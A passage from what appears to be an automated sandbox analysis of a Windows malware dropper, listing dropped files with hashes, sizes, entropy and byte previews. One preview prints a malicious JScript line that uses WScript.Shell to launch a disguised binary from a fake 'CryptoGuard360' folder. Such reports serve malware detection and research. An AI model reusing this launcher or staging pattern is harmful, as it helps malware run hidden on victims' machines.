                                                                                                      • Filename: 9FB5#U007e1.EXE.exe, Detection: malicious, Browse
                                                                                                      • Filename: wanscam software ocx setup download.exe, Detection: malicious, Browse
                                                                                                      • Filename: wanscam software ocx setup download.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse
                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe, Detection: malicious, Browse
                                                                                                      • Filename: #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe, Detection: malicious, Browse
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\611485\Heroes.com
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):229
                                                                                                      Entropy (8bit):4.924376000960641
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:RiJsJHonwWDaJ0/hJkDy4eMu8HMaW1LiGfwWDaJ0/hJkDy4eMuuS:YJSQjW0hF4LiaGWG7W0hF4LXS
                                                                                                      MD5:8E548EE73EA47156F471F85EE1F8107B
                                                                                                      SHA1:519AF4D547F8A924F309B2513DB37DBECCB6273D
                                                                                                      SHA-256:CD5F9F7DEA91333A81CB066C05EA33944995C76E029A0C49DA0BAE5C6B81A716
                                                                                                      SHA-512:A4B1D47F3A5F4ACE37F69307A40F457FD57DA82F97E2B91F6610532155099233AD7218B1A0349F2A529504653F3831FBAD103448A4DAD48C2268DA3C98EE22F0
                                                                                                      Malicious:true
                                                                                                      Preview:new ActiveXObject("Wscript."+"Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CryptoGuard360 Scan Elite Systems Inc\\GuardianCryptoScan360.com\" \"C:\\Users\\user\\AppData\\Local\\CryptoGuard360 Scan Elite Systems Inc\\U\"")
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\611485\Heroes.com
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):765463
                                                                                                      Entropy (8bit):7.9997606128666865
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:12288:5GCzKFazkafToVOm4GRL9pSvQ3ACwpExdTJ+q7AeXzZcvoGneH3pbcfviek3gCX2:5/WFaJkImVxDqQwCw8dt+BeXzlvXpoft
                                                                                                      MD5:E64B4FD591E23A3B9479E107D5CA39A9
                                                                                                      SHA1:30E9FA59391DFCCCD8330FBDD668880C9727FC12
                                                                                                      SHA-256:077978CEE3AD812C7946045A9597A15A880545D82DCA2AE3142B66BBA39C69A5
                                                                                                      SHA-512:0CB9551D2E5E09BD6603C9C81822FC26B5AEC268141A51FF0A832A15B315E5989232E1083298E0EEF29DEB6393A561F7BFBB795E9A298FC85EC126B239932E06
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1434
                                                                                                      Entropy (8bit):5.342612360333169
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4TE4KmJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qHd
                                                                                                      MD5:DED544725C0FC4A9C1A4064260007227
                                                                                                      SHA1:C196627F0D20E14F0240201AC995E9BEBC399C29
                                                                                                      SHA-256:82F1B25C0D0DC1B72BFE5E837B668E0087D7E469CCCF909924B72FEC5C1C8F10
                                                                                                      SHA-512:41A800B36C9017CB5B9D427C9AD317ACAC680FCE5FF85391497F6BE489782423B7E22A27CD7211C2E110B5465418747841A42A16C40D1A41A0CD27D192F2A7A5
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen
                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):765463
                                                                                                      Entropy (8bit):7.9997606128666865
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:12288:5GCzKFazkafToVOm4GRL9pSvQ3ACwpExdTJ+q7AeXzZcvoGneH3pbcfviek3gCX2:5/WFaJkImVxDqQwCw8dt+BeXzlvXpoft
                                                                                                      MD5:E64B4FD591E23A3B9479E107D5CA39A9
                                                                                                      SHA1:30E9FA59391DFCCCD8330FBDD668880C9727FC12
                                                                                                      SHA-256:077978CEE3AD812C7946045A9597A15A880545D82DCA2AE3142B66BBA39C69A5
                                                                                                      SHA-512:0CB9551D2E5E09BD6603C9C81822FC26B5AEC268141A51FF0A832A15B315E5989232E1083298E0EEF29DEB6393A561F7BFBB795E9A298FC85EC126B239932E06
                                                                                                      Malicious:true
                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64512
                                                                                                      Entropy (8bit):7.997035276350578
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:daeym8VnLbnEucYvheveCUtn7JIX+rHvJ9Y/5Ie6aDVBp:iVnnECvoGCUtneiY16aD7p
                                                                                                      MD5:C34D602E089753122AE7CE255DE74BD2
                                                                                                      SHA1:35E45CE8176F12B077EFB56A1B29EEE134573CFE
                                                                                                      SHA-256:1534DBA22C18D1215CA69E87EDBD7C70F84675A8FD822AF43CB728777B6F8719
                                                                                                      SHA-512:F496E93B148064E4119717EE8967B8170D6AE8F6B895E0700ABA562B7C713A2A88F861F4BCE020B6E7872D2C47592AD0D60AC6099DBF98836ADAF65AE875DDF1
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):84992
                                                                                                      Entropy (8bit):6.441803958974096
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdE:VZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/a
                                                                                                      MD5:ABFE2AE4D2C4C943D682529B5D0B6BF9
                                                                                                      SHA1:4758ABD740AECCFB642CB76155EF3B8F061DA3CE
                                                                                                      SHA-256:F9B7F6B578BD73092ACA950965735700AE26CB4E072C7CA286C8D38A1EC2E65F
                                                                                                      SHA-512:3BFFA705874A7A87A9889CF61B06C4E0D76579E7C348F9B7216FB6CB0436306739807718FE416DD2AAA317C175AC57687CA1F0D037AB59C583E018468ED5374B
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):111616
                                                                                                      Entropy (8bit):5.666559555007303
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:SaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/8:SMbFuz08QuklMBNIimuzaAwusPdI
                                                                                                      MD5:FC0855678FF0495BB7D6B28D688BE69A
                                                                                                      SHA1:1FFE4942FA8289E65C25FD667E5E5D24BDC03623
                                                                                                      SHA-256:9C33A8509853B06AAE84E7A4519AC40214FEDD1EDBE182B99420CDACBEC0C0B1
                                                                                                      SHA-512:2D466F8D6D1267F31968FF7AD3F1BE2D34FA7E4BC9D8A26FC469E38B6349836CB7D75E0D1F29E96686537FE86923B2B3508EDE6DB3F1BB0164C012572425389A
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):99328
                                                                                                      Entropy (8bit):5.115012275512552
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:baj6iTcPAsAhxjgarB/5el3EYrDWyu0uZi:G6whxjgarB/5elDWy4Zi
                                                                                                      MD5:C898CD57BB6DDA337CC44FCA391ADB96
                                                                                                      SHA1:ECBE57C52D36C1C679FCF1586B320CF957F72A0E
                                                                                                      SHA-256:C7D2043895A811B3D8B23682BD4686F0D4997B6403DFFC76853D4A21A30881E4
                                                                                                      SHA-512:4C880A5A359512C8E678DFA7A7C0E1EC2D88733A43E38DEB9B33D933E2FD40D9F2FACEA001285078B92E4D075BC9E467DC9BDBE349D97AF0B15B8D3BFB4BDABB
                                                                                                      Malicious:false
                                                                                                      Preview:.I.F...W.H.I.L.E...W.E.N.D.....D.O.....U.N.T.I.L...F.O.R...N.E.X.T.....T.O.....S.T.E.P.....I.N.....E.X.I.T.L.O.O.P.....C.O.N.T.I.N.U.E.L.O.O.P.....S.E.L.E.C.T.....C.A.S.E.....E.N.D.S.E.L.E.C.T...S.W.I.T.C.H.....E.N.D.S.W.I.T.C.H...C.O.N.T.I.N.U.E.C.A.S.E.....D.I.M...R.E.D.I.M...L.O.C.A.L...G.L.O.B.A.L.....C.O.N.S.T...S.T.A.T.I.C.....F.U.N.C.....E.N.D.F.U.N.C...R.E.T.U.R.N.....E.X.I.T.....B.Y.R.E.F...W.I.T.H.....E.N.D.W.I.T.H...T.R.U.E.....F.A.L.S.E...D.E.F.A.U.L.T...N.U.L.L.....V.O.L.A.T.I.L.E.....E.N.U.M.....A.B.S...E.R.R.O.R...E.X.T.E.N.D.E.D.....M.S.E.C.....S.E.C...M.I.N...H.O.U.R.....M.D.A.Y.....M.O.N...Y.E.A.R.....W.D.A.Y.....Y.D.A.Y.....P.R.O.G.R.A.M.F.I.L.E.S.D.I.R...C.O.M.M.O.N.F.I.L.E.S.D.I.R.....M.Y.D.O.C.U.M.E.N.T.S.D.I.R.....A.P.P.D.A.T.A.C.O.M.M.O.N.D.I.R.....D.E.S.K.T.O.P.C.O.M.M.O.N.D.I.R.....D.O.C.U.M.E.N.T.S.C.O.M.M.O.N.D.I.R.....F.A.V.O.R.I.T.E.S.C.O.M.M.O.N.D.I.R.....P.R.O.G.R.A.M.S.C.O.M.M.O.N.D.I.R...S.T.A.R.T.M.E.N.U.C.O.M.M.O.N.D.I.R.....S.T.A.R.T.U.P.C.O.M.M.O.N
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):92160
                                                                                                      Entropy (8bit):7.997765237781534
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:UOJ05kNsmLFvc70ZQiWfvEgkOMekTfvrK4/mf1tiR8xN4fYxZwwuP+MRDsMQ:UOCON9LI0ZQiWfv8q4fjKtieJxvuPrD8
                                                                                                      MD5:1930AF9B7CB0128D2C45F5BB68511797
                                                                                                      SHA1:BEB1E3B1D9D59E0CDEEA134824049D9AAB3371E2
                                                                                                      SHA-256:851C97A6FCC5D44E9F5171CC6A60C2A049DB76823821889CA813A83528C5703B
                                                                                                      SHA-512:5CD4820605E68920AAFFC2C84FC120D5066C9B2801AFB0C01E4EB64A3214B912F301D9789337AD7B75364C54138F0052F11C25BAAB6D07CCC2AC8EBA0C31AA16
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):70656
                                                                                                      Entropy (8bit):7.997296529898689
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:WlAHj1yaY3yuIgW9ijBmR8MIrRfkM1g9zDCrnm8MQyRM:rD1Q3rMIr1BgdGnm8Wa
                                                                                                      MD5:CCC78E586F3EF736D4A3BA0165A98EC9
                                                                                                      SHA1:2B63A6C69C8B3535B0AE1FB563A22743C9CB0790
                                                                                                      SHA-256:E242892944CC7BD048596FED266EBFB6F4A8B58C9D44C3B200FF13C9B43B287D
                                                                                                      SHA-512:F218990F7EB12B67FBE14243345F0E6C621DEA2E6BF70F3D225A09E84E2E94A9CA6E88D7E24E6C0059A1BF71C19BFFC505724F08592DE27ABC6B5C88F08EFC43
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):7.997357972127114
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:7zI4/35ELiEcHtSX7D3jtzRGtWdOfhnOfMlzkXlJOzl0FIv:7k4/pELi5HtS33OtuOfnzkc
                                                                                                      MD5:9F77A5C62B4CAA51A17C7BA0F25708E5
                                                                                                      SHA1:F89C7CF085C589B19A8F4F754EFA7F0DCCBA8049
                                                                                                      SHA-256:5BD843AD12B797BD8C4606E6DB60C307B01AAD218496EA2BF814A39D559B0FA9
                                                                                                      SHA-512:F28CCACC0FAA704B6671281DE5FA533278CE9101B8F46424F5C509D164699E853C845A40E60223CDC67B811DD326700346D0D2D0B66B25334FB353DDAA42F94C
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:ASCII text, with very long lines (587), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10160
                                                                                                      Entropy (8bit):5.200334067396374
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:J4G/8NCcRaBLEquWTK1l/ZzlKTSmoDwkeazvXD7AgOSHNmLWDSXimR:yG7cRU9uThxKTSNwkDvAyfCR
                                                                                                      MD5:D7ABF909D592DACFB1FAF1169A4167CB
                                                                                                      SHA1:D0E61DD874998B1BB63898BB668DC70DF1D391EC
                                                                                                      SHA-256:33FE0DD98D7E0A161F67FB2F2916606BC5F455BC2A2D85365384A03C0142AB1D
                                                                                                      SHA-512:E024AFB654123559056BD7E205AF88CA2D21E37449168B79C2A81C6F8D6C3A54EF9BC5315631C65B7B8FA1001A8A7301C54BEABEB58646EA6533452DE7739E4B
                                                                                                      Malicious:false
                                                                                                      Preview:Set Coding=5..XiMhMom(Turns(Matters(Remove(Spirits(..QNGuns(Cartoons(..stAVenue(Snowboard(Giant(Seemed(Petroleum(..kXGtDays(Shark(Covering(Pens(Newspapers(Nu(Larry(..yyGuarantee(Things(Nearly(..ZUFutures(Receive(Iso(Separate(Championships(Abstract(Examinations(..Set Condition=u..zitForward(Employees(..gunImplement(Ben(..yuElder(Tables(..uYYZWorker(Letter(Lighter(Command(Spots(..VWvSummary(Magnitude(Msgid(..ySoQPounds(Rj(Operational(..ObBoutique(Troubleshooting(Housewives(Deadly(..Set Replacement=6..TwjRussell(Bunny(..GSGive(Biggest(Zambia(Wikipedia(Computational(Injuries(..YwAutomobiles(..eoConsistency(Epic(Dealtime(Symantec(Car(..EnATested(Registered(Assure(Dead(Image(Estimate(Synopsis(Pulse(Respective(..Set Commitments=2..eXTJSupervisor(Movements(Unlikely(Panasonic(..FAZSaw(Lots(..ICFvBone(Breeds(Edmonton(Bath(..oXXsWebshots(Tired(Wagon(Wifi(Characterized(Recreational(Reveals(Consequence(..tuSmell(Limits(Drama(Shadows(Usual(Years(..tIePk(Springfield(Retreat(Hair(Equipped(..cZArchitec
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 490052 bytes, 11 files, at 0x2c +A "Labor" +A "Sad", ID 7944, number 1, 29 datablocks, 0x1 compression
                                                                                                      Category:dropped
                                                                                                      Size (bytes):490052
                                                                                                      Entropy (8bit):7.998488808013735
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:vXPVvY8K1ayz1VFoMhHxAzVHfnGFhqSMJWlInY5STSDrMusBfrvqvFkNu83WmMWq:Hw1a21VxHKJHWqX4MdTvqdkg83FMN
                                                                                                      MD5:D03D5BE541C32DA5F3E92A1A8D1CCB55
                                                                                                      SHA1:AD2A0642E47E2ABE543929847AC751744924D4DD
                                                                                                      SHA-256:B2E4BF189DF27B20FC60668967DDCB8F3EDC05790696956FE78396DC0540D6C0
                                                                                                      SHA-512:21E11BB7861CE2F3D927C4396B52AEB2D76D92543454844F40A4D6B2062CCE14E75A341C5CED9E84F96FAFD9136483FAFB9D8A5B4850CE4E4F66531274571611
                                                                                                      Malicious:false
                                                                                                      Preview:MSCF....Dz......,...................5.................cZ.. .Labor...........cZ.. .Sad...........cZ.. .Dies..x...h....cZ.. .Legends..L........cZ.. .Closely..\...,....cZ.. .Sandwich...........cZ.. .Investigations..\........cZ.. .Jersey...........cZ.. .Disabled......j....cZ.. .Technical..<..Z8....cZ.. .Mailing...94H..CK.}.xS...M{..r.T(.P5..E.+......RP.Q.K.EHd_...........C)[....lBATV..\R.@....s..,U.....}.ozg.9s..3.d.\A.4R.......r..(..a..xeSyGS....`r.I.$..pl..t.rf..a..JndN.O..w...:L..$p..3...:-.....;T......Z.v[#.gB.P.K...I.q..vE.JB.#r.l*...v...y$iV]..kp..3.6.S..gC.!~.$i.q.......|.B$...I........._....T6...>..R........3 .J....H..n..E.....j{)Rr...JB...;...HY$..sW.^J......F6.O.#.Z1.0....1...Z.i.>".eD.U..$O.d..I.J2.../...j..j,.j-.....B.o(&..3;..5...`.|... ..k4.x.......y!O...}.$.h..8.!....,..}.0...../...U...B.4.....O....f..{.4..D.) R3"....|:F.....K...V.M.'T........&....xQsf}...d.MQ#J.....H>F..h:"..}#h..`/..;......#4...#.|..].T...1..?U......0.a .t.*.d.`..#..5U&...h.T.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):69632
                                                                                                      Entropy (8bit):7.997511161386915
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:xGN5V6sPRlC4pgEbJRIYWshTASDy9j2Ke7P5dsu7L10Wt0KJe:xEwOC4yEtJWshdkj2JctYQ
                                                                                                      MD5:83C029CBE964C34D4E1421A5CE60F0DA
                                                                                                      SHA1:545EE1AD42E0DD4C8844192319F51DA7DF1CC0BF
                                                                                                      SHA-256:ECEA3E35ADB9FCA6EBE845ABE882EEC62086CC04E16B32A7E73CD30889FCD456
                                                                                                      SHA-512:EC1128EC494F323E8F4449A728C2F5D06C8482218352EC5CBBA6FCCD4737C03FCE075AEE6CFAC6021542471EEC096B0AF810E1D3256A5715313A157A5CEBB28B
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):94208
                                                                                                      Entropy (8bit):7.998257789731633
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:2vazpHrkryS3Dr6udHihIKYvEp28K4Dqatxe3LQR6UWk6wq3CKey9:DV6ygLEI9Y2L4Gat8LsXc3uy9
                                                                                                      MD5:DE691508EB047ADDF11DB2CEE8D4C39E
                                                                                                      SHA1:FBB99FAE2F64838F0A324C9CD07F18AE48F6B6D3
                                                                                                      SHA-256:A4B2E8ACB5F8EBED6B9FDBE9269DC77E0F66B4921C3705F1250210F766732F1D
                                                                                                      SHA-512:8C20DEECBAE89010958F0602888B7A900B03B2D324CB0870D799F7175DE3B94F6594A0F132ABCAC274EF64F203304C6CEC7462CB27A36DDE88306917D7577D18
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):703
                                                                                                      Entropy (8bit):4.151976239489092
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:LNyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1v:ByGS9PvCA433C+sCNC1v
                                                                                                      MD5:AEB8D17005A7B59152B99133343B8A90
                                                                                                      SHA1:64C9A7A417B46EAC069C37C9976B2288438FE6AE
                                                                                                      SHA-256:80D8CA9EA5DC757D9AD8EF768CB49F537A3AAB7366DAFA768F683B157FA09EB8
                                                                                                      SHA-512:AEB5C3ED9FDF4054DC5CEE6B0D16A9E5E348037E13E4B6608FD26104B8051258709C92487C7747A1ADD0D890C25B11C8E364B7420D4C3890AC7C9272257B9870
                                                                                                      Malicious:false
                                                                                                      Preview:Gd........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):89088
                                                                                                      Entropy (8bit):6.0850961443059814
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:3zW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWcG:3zW9FfTut/Dde6u640ewy4Za9coRC2j6
                                                                                                      MD5:670AA931F1760B705E66A6F81FEB8E8A
                                                                                                      SHA1:648FF01BC8C7FDBF93DC0F2586A44FEDA250792E
                                                                                                      SHA-256:0426CDB932A67E819AB54ADB36B084CCA6777F89A48375853F3A0A7E1C4BBA0B
                                                                                                      SHA-512:940377AEADC75DF3B27C17D5CEA29A9377FA24B13BD462828A371950BE29772FDA9895458306318D85F56B63D40C20E622F68675CA005D8519C3FEEB14DD8DF2
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):124928
                                                                                                      Entropy (8bit):6.711637785305587
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:0ydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5s:07HS3zcNPj0nEo3tb2R
                                                                                                      MD5:B3B41F412B665144AD32021FAD2BFE4C
                                                                                                      SHA1:5AC9F804CB0368589B876455EA3903A22453BD58
                                                                                                      SHA-256:501D14BA25C48306536545E61EA3A4944A6ECB05E374AB8C840CF9BDA2EA02F9
                                                                                                      SHA-512:349989B0C39094AAC3B677F3E6E01640103789535CEF16E2521B2EAD6D1CBE734F1CF9043CD1FF16E2CC3B60EDED536A1871D55FDB118EC8E07FAE4FF909FF36
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):96256
                                                                                                      Entropy (8bit):6.660849946274641
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:4FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3B9:4U4CE0Imbi80PtCZEMnVIPPBxT/sY
                                                                                                      MD5:FEA0A85FDC235600B2F32E9A2751F176
                                                                                                      SHA1:87256897EF3A7ADDFB2601F9C588DF991A66835B
                                                                                                      SHA-256:A5A44BB84EFC4AAF1BEDB4B114EA34ABF3CA49B65E66EC8376E2DBD9D9C9EC12
                                                                                                      SHA-512:4CEC42351ACCF2EDB52EBB71D6807E38E2FD3209831497A52F795258A24256B97D209ADC6738756EC79F6B1AEC78C5B981D078BD0AECFCBE93EDFE6BCFAE6BC7
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):146432
                                                                                                      Entropy (8bit):6.59958080350218
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:iVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLw:F6AUkB0CThp6vmVnjphfhnvO5bLw
                                                                                                      MD5:22824EB5FF3BF2DC89B618DB79E85ECE
                                                                                                      SHA1:C981ABA2440E53160B8CB9C6925D7404B698B0DC
                                                                                                      SHA-256:3FE100C79605366AEB19E2A6B59361B5928DA3EB85CC894D3C5779605EE2B14B
                                                                                                      SHA-512:EB18D1F7B0940A5DAD511B8351234359F89B5C6870E0189ABF755517E93A029336CFC23D7BD67588EB01678DC09DADD9B271BC6E07E871840F6A370DE3C4B639
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3607
                                                                                                      Entropy (8bit):7.945429391114646
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:rWaLA34MR+2UsUlyKzJpZjuwa+Ys2rKzPJnW:rWaLL7Znulhs2ryI
                                                                                                      MD5:942045B671FE3FCF91DDAC5473424385
                                                                                                      SHA1:DC7B9A8C7C5D3596745BE35E47DE31B81FB1E64C
                                                                                                      SHA-256:7272B2939544ACE81B7CCCD8884C4E5C84A5FDDFEE53F01350B016FE26B2E2C2
                                                                                                      SHA-512:63A3C48D9760CBCA465B4F860B2AD4ED6F84AFE009FE4F623E4D301109FA1395E4C343ED4E18847CD1463A26BE58499BF3E6E88DE4179C89966B69C1D488D61F
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):61440
                                                                                                      Entropy (8bit):7.99748761872078
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:oRiLqZ60gu4rzJHgJvr6x0fwZAUFXlNHF:2lZ3gu4gOx0gtbF
                                                                                                      MD5:7F6C343C22BA98AE47DB13A22F7E4DEC
                                                                                                      SHA1:84BE0648F3783F1DFDB12DEF62296D7EBF84DC9E
                                                                                                      SHA-256:5280B6B766FF0FC17B1D55ABC3B3698172897489B060460F31CCC653B5E76594
                                                                                                      SHA-512:E91F74D1D1988A3FD500539716C91AEC35487B89F70BC69803CC79C01642D7EB8FD69DF8B75338DDE2BB2E8BBB5CBBEC6E667536B844A6AFAD87BEC9466B6FDD
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):52224
                                                                                                      Entropy (8bit):6.234323020106327
                                                                                                      Encrypted:false
